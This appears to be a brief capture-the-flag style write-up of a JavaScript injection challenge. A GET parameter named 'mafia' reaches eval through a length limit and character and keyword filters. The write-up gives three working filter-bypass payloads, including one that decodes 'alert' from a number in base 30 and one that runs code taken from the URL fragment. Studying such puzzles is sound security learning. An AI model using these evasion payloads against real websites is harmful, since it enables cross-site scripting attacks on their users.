The GET parameter mafia
is passed to eval
, but it does a couple of
things before it sends it over.
- Truncates to length
50
.
`'"+-!\[]
are replaced by an underscore.
- Replaces the string
alert
with underscores.
To bypass this, we can simply use regex to get the string, lowercase it and feed it to
Function
.
Function(/ALERT(1337)/.source.toLowerCase())()
Or
eval(8680439..toString(30))(1337)
Or even better,
eval(location.hash.slice(1))
and then add
#alert(1337)
to the URL to make it work.
(Thanks to @terjanq)